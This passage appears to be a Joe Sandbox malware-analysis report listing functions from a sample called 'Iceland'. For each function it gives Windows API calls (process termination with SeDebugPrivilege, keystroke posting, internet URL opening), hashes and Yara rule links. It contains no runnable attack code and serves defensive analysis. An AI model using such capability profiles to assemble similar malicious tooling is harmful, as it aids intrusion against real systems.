Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 397c8a03d6fb559c277cdccfbf02ad211b00fd4eac2b796d2975885a6461d2d4
Instruction ID: 2b215aabf819915beda0f471cab4462762b5d72ec3b385d42a34a052f2a34d29
Opcode Fuzzy Hash: 397c8a03d6fb559c277cdccfbf02ad211b00fd4eac2b796d2975885a6461d2d4
Instruction Fuzzy Hash: 8DC15939A0465ADBDB10CFA9C540BEDFBB5FF18310F14841AE8A5E3250DB34A985DBA1

Function 0094D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0094D237
_free.LIBCMT ref: 0094D2A2
_free.LIBCMT ref: 0094D2C8
_free.LIBCMT ref: 0094D2F1
_free.LIBCMT ref: 0094D329
_free.LIBCMT ref: 0094D35A
_free.LIBCMT ref: 0094D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0094D41C
_free.LIBCMT ref: 0094D435

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: f783fe3e1b565557ed6a7e5aec2f070b6d86a508b43eb887baca6e7a40173825
Instruction ID: 7bae02ab6acfdc272959a519b3418dd5373b5cd6211d4d7113daa966a9c5af6e
Opcode Fuzzy Hash: f783fe3e1b565557ed6a7e5aec2f070b6d86a508b43eb887baca6e7a40173825
Instruction Fuzzy Hash: 97613875A06300AFDF21AF74DC81FAE7BA8EF42324F1405AEF954AB2C1E6719C408791

Function 009A5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009A5C24
ShowWindow.USER32(?,00000000), ref: 009A5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 009A5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009A5C6F

Part of subcall function 009A79F2: DeleteObject.GDI32(00000000), ref: 009A7A1E

GetWindowLongW.USER32(?,000000F0), ref: 009A5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009A5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009A5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009A5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009A5D34

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 1172c6d825ff9881088b906571dd1720f244e3302ce7d27b1b4ee8136f1ba194
Instruction ID: 22b289e5aec47aa339a71abe971e49f546ca1203d9b0c4b31ad98e45ce707b44
Opcode Fuzzy Hash: 1172c6d825ff9881088b906571dd1720f244e3302ce7d27b1b4ee8136f1ba194
Instruction Fuzzy Hash: 6851CF30B50A09BFEF249F24CC49BD83B79FB06761F168111F6259A1E1C775A984DBD0

Function 009113A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009528D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009528EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009528FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00952912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00952933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00952942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0095295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009111F5,00000000,00000000,00000000,000000FF,00000000), ref: 0095296E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 5632c06c782704dabf0d9b1cc0cc1566df5d465afe401dd6e3ef432f56edd2b9
Instruction ID: 16d1aa7cfbaecc852ba680f615dffc7df7e3761c797c22d2b6bd28e0d0a843dc
Opcode Fuzzy Hash: 5632c06c782704dabf0d9b1cc0cc1566df5d465afe401dd6e3ef432f56edd2b9
Instruction Fuzzy Hash: C8517A70610209AFDB24CF25CC85BAA7BB9FF89710F104518FA52976E0D770ED90EB50

Function 0098CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0098CBC7
GetLastError.KERNEL32 ref: 0098CBDA
SetEvent.KERNEL32(?), ref: 0098CBEE

Part of subcall function 0098CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0098CCB7
Part of subcall function 0098CC98: GetLastError.KERNEL32 ref: 0098CD67
Part of subcall function 0098CC98: SetEvent.KERNEL32(?), ref: 0098CD7B
Part of subcall function 0098CC98: InternetCloseHandle.WININET(00000000), ref: 0098CD86

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: c26e49b69f9627b5dc8a9c598b6b8f8e71a93e1116d3eafd0044f0e957df9757
Instruction ID: 5bc328dce94bb64df5941969d6330362fa995faabf4ec23932d955af32c4ccb9
Opcode Fuzzy Hash: c26e49b69f9627b5dc8a9c598b6b8f8e71a93e1116d3eafd0044f0e957df9757
Instruction Fuzzy Hash: 4E316DB1505705AFDB21AF71CD44A66BBB8FF45304B04491DF89A92B10C731D814EBA0

Function 00972EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00974393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009743AD
Part of subcall function 00974393: GetCurrentThreadId.KERNEL32 ref: 009743B4
Part of subcall function 00974393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00972F00), ref: 009743BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00972F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00972F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00972F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00972F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00972F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00972F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00972F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00972F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00972F74

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a40cdc954278d1f5d24abfe47795444836d5380ad033347e7d8f27adf497aeb4
Instruction ID: 89d6dcf969acdbe118e336f259dffb7e09ff2f45d9fd663a2db3e41f218be007
Opcode Fuzzy Hash: a40cdc954278d1f5d24abfe47795444836d5380ad033347e7d8f27adf497aeb4
Instruction Fuzzy Hash: 0D01D4317A8210BBFB1067699C8AF593F5ADF8EB11F100011F31DAE1E0C9E264459EE9

Function 00972150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00971D95,?,?,00000000), ref: 00972159
HeapAlloc.KERNEL32(00000000,?,00971D95,?,?,00000000), ref: 00972160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00971D95,?,?,00000000), ref: 00972175
GetCurrentProcess.KERNEL32(?,00000000,?,00971D95,?,?,00000000), ref: 0097217D
DuplicateHandle.KERNEL32(00000000,?,00971D95,?,?,00000000), ref: 00972180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00971D95,?,?,00000000), ref: 00972190
GetCurrentProcess.KERNEL32(00971D95,00000000,?,00971D95,?,?,00000000), ref: 00972198
DuplicateHandle.KERNEL32(00000000,?,00971D95,?,?,00000000), ref: 0097219B
CreateThread.KERNEL32(00000000,00000000,009721C1,00000000,00000000,00000000), ref: 009721B5

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 7b609ce93a0afc25d395a79077c35d326231186d42b868bc37c1a44192055fab
Instruction ID: 075e8bd71fdf35de2847e206163d3cc32e5d980343f6ecab4605fef0e5e2ceff
Opcode Fuzzy Hash: 7b609ce93a0afc25d395a79077c35d326231186d42b868bc37c1a44192055fab
Instruction Fuzzy Hash: FE01BBB5259304BFEB10AFA5DC8DF6B7BACEF89711F418411FA05DB5A1DA709800DB60

Function 0099AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0097DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0097DDAC
Part of subcall function 0097DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0097DDBA
Part of subcall function 0097DD87: CloseHandle.KERNEL32(00000000), ref: 0097DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0099ABCA
GetLastError.KERNEL32 ref: 0099ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0099AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0099ACC5
GetLastError.KERNEL32(00000000), ref: 0099ACD0
CloseHandle.KERNEL32(00000000), ref: 0099AD21

Strings

SeDebugPrivilege, xrefs: 0099ABEC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: cc113a7c4e4a4ca6bfff39967f1d9c9af0869df0cd68b5b58e02e0f2f4a2fc75
Instruction ID: 6332020f06bb4fac17bad5e18a84a33a8744d928a78647f68c3b9acdeeb2cc44
Opcode Fuzzy Hash: cc113a7c4e4a4ca6bfff39967f1d9c9af0869df0cd68b5b58e02e0f2f4a2fc75
Instruction Fuzzy Hash: 5C618E70208242AFD714DF18C495F25BBA5EF94308F54849CE8A64FBA2D775EC85CBD2

Function 009A4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009A43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009A43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009A43F0
_wcslen.LIBCMT ref: 009A4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 009A4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009A4490

Strings

SysListView32, xrefs: 009A4393

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 66f8b91745a31df4f61d864d9172400efc1ff1ee1b62fa3734583a0a135c6746
Instruction ID: ffcd08330fa85a00b25441332e60fd752d025d044fe7fd1f5933b156a2b6e211
Opcode Fuzzy Hash: 66f8b91745a31df4f61d864d9172400efc1ff1ee1b62fa3734583a0a135c6746
Instruction Fuzzy Hash: 5441CD71A00309ABDF21DF64CC49BEA7BA9FF89350F100126F954E7291DBB09980DBD0

Function 0097C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0097C6C4
IsMenu.USER32(00000000), ref: 0097C6E4
CreatePopupMenu.USER32 ref: 0097C71A
GetMenuItemCount.USER32(01435F88), ref: 0097C76B
InsertMenuItemW.USER32(01435F88,?,00000001,00000030), ref: 0097C793

Strings

2, xrefs: 0097C6FE
0, xrefs: 0097C66F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: af13d19a1a6924e00c39063a0b47ee589c38db6b1186f372a93ea07a24cfe91e
Instruction ID: a442e4aa0ab84fbd0cbd8b0782f5e938e7fabd1b0096e47f67aa01705bf74fb3
Opcode Fuzzy Hash: af13d19a1a6924e00c39063a0b47ee589c38db6b1186f372a93ea07a24cfe91e
Instruction Fuzzy Hash: 215192B2A002059BDF18CF68D884BAEBBF9AF45314F24C51EF919A7291EB709940CF51

Function 0097D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0097D1BE

Strings

question, xrefs: 0097D177
stop, xrefs: 0097D18F
warning, xrefs: 0097D1A7
info, xrefs: 0097D15F
blank, xrefs: 0097D140

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: b9ba9c7179251605837545e131f257f95065435e47be353e40a82f17a4ee917a
Instruction ID: fb7c60199e29abeb93df7cea8ae0c20dd0000a892066b398bebf1eefff2c21d6
Opcode Fuzzy Hash: b9ba9c7179251605837545e131f257f95065435e47be353e40a82f17a4ee917a
Instruction Fuzzy Hash: FB112C3338E306BEEB095F54DC82DAA77BC9F45B64F60802BF509A62C1F7B47A004660

Function 0097E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0097E759
gethostname.WSOCK32(?,00000100), ref: 0097E773
gethostbyname.WSOCK32(?), ref: 0097E780
inet_ntoa.WSOCK32(?), ref: 0097E7C2
_strcat.LIBCMT ref: 0097E7D0
WSACleanup.WSOCK32 ref: 0097E7F5

Strings

0.0.0.0, xrefs: 0097E79E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: e9bdcb5f4a0003dc80209a4520a7ee74e8bd359266a516ad8bd5ab473fc33a68
Instruction ID: f0fc4c056c67e10319260a3d5e9b0fac8ddd332f58015d30e2ea670072157dbf
Opcode Fuzzy Hash: e9bdcb5f4a0003dc80209a4520a7ee74e8bd359266a516ad8bd5ab473fc33a68
Instruction Fuzzy Hash: 631129729051147FCB286774DC4AFDE77BCEF86710F0140A5F54AA6091EF749A82DBA0

Function 0097F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0097F641
_wcslen.LIBCMT ref: 0097F652
_wcslen.LIBCMT ref: 0097F690
_wcslen.LIBCMT ref: 0097F6C6
_wcslen.LIBCMT ref: 0097F6F6
_wcslen.LIBCMT ref: 0097F706
_wcslen.LIBCMT ref: 0097F742
_wcslen.LIBCMT ref: 0097F771

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 539c01483fa5f999afadae9d41f7c668ee42bee1affb74d26adf5f4647fb08ca
Instruction ID: 26a0e52e64749c8b5ac953374316b9e551e7a482b1a419f6a00d9b84fbfd8c02
Opcode Fuzzy Hash: 539c01483fa5f999afadae9d41f7c668ee42bee1affb74d26adf5f4647fb08ca
Instruction Fuzzy Hash: 11419F66C11214B5CB12EBB8CC8BBCFB7A8AF45310F518466E518E3121FA34E255CBE6

Function 0092FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009539E2,00000004,00000000,00000000), ref: 0092FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009539E2,00000004,00000000,00000000), ref: 0096FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009539E2,00000004,00000000,00000000), ref: 0096FC98

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f052df048d9bd6868bb1313a567ad75750ec7fdb8545fbd04c89590f0a937922
Instruction ID: 6faade243c4db0484d71d21bc5198b274a8dac7faafbff8146073873220504cc
Opcode Fuzzy Hash: f052df048d9bd6868bb1313a567ad75750ec7fdb8545fbd04c89590f0a937922
Instruction Fuzzy Hash: BB412C3160D7989AC738CB38E9B8B793BB9AF57310F14493CE9C756968C639A840D710

Function 009A379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009A37B7
GetDC.USER32(00000000), ref: 009A37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A37CA
ReleaseDC.USER32(00000000,00000000), ref: 009A37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009A3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009A3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009A6504,?,?,000000FF,00000000,?,000000FF,?), ref: 009A385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009A387D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ab3c242f1a68ea146b8741aa1e14a86f67120781f22bab7d488a033e0a4c4b4a
Instruction ID: 88bf081fccb27c93db79d90c7a103c3d61f8635a69a87350dda6790a883521cc
Opcode Fuzzy Hash: ab3c242f1a68ea146b8741aa1e14a86f67120781f22bab7d488a033e0a4c4b4a
Instruction Fuzzy Hash: 7B31AEB2215224BFEB158F54CC89FEB3BADEF4A751F044065FE099A291C6B59C41C7E0

Function 00995A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00995A64
NULL Pointer assignment, xrefs: 00995A8B, 00995DE0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bff583b3561099cbc2cd76ce856f0d79a4d18876979dbacf027c7272ad8eef4a
Instruction ID: 9fcb96acf972c140261b49311217971c79e0d231812c6bd79bcfa1ff993e647c
Opcode Fuzzy Hash: bff583b3561099cbc2cd76ce856f0d79a4d18876979dbacf027c7272ad8eef4a
Instruction Fuzzy Hash: 4CD1B071A0060A9FDF11CF68C885BAEB7B9FF88314F168469E915AB290E770ED45CB50

Function 009518A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

